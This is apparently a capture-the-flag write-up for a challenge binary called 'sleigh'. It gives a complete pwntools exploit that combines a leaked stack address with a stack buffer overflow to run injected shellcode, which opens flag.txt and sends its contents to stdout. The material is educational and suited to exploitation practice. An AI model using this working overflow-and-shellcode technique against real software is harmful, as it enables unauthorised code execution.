Tags: shellcode bof pwn stack-smash 

Rating:

NX Stack is disabled meaning we can write shellcode onto the stack and execute it. We get given a stack leak pointing to the start of the input buffer. So we can write shellcode, overflow the return pointer, ret2shellcode, profit.

```python
#!/usr/bin/env python3

from pwn import *

elf = ELF("./sleigh", checksec=False)
context.binary = elf
rop = ROP(elf)
#context.log_level = "debug"
gs = '''
continue
'''

def conn():
if args.REMOTE:
r = remote("178.62.75.187", 31878)
else:
r = process([elf.path])
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
return r

p = conn()

# Shellcode to read flag.txt
shellcode = asm("""
/* open(flag.txt, 0, 0) */
lea rdi, [rip+flag]
xor rsi, rsi
xor rdx, rdx
push 2
pop rax
syscall

/*sendfile(1, rax, 0, 60) */
mov rdi, 1
mov rsi, rax
xor rdx, rdx
mov r8, 60
mov rax, 40
syscall

flag:
.string "flag.txt"
"""
)

p.sendlineafter(b">", b"1")
p.recvuntil(b"sleigh: [")

stackleak = int(p.recv(14), 16)
info(f"Stack leak @ {stackleak}")
payload = flat({0: shellcode, 72: pack(stackleak)})
p.sendlineafter(b">", payload)
p.interactive()
```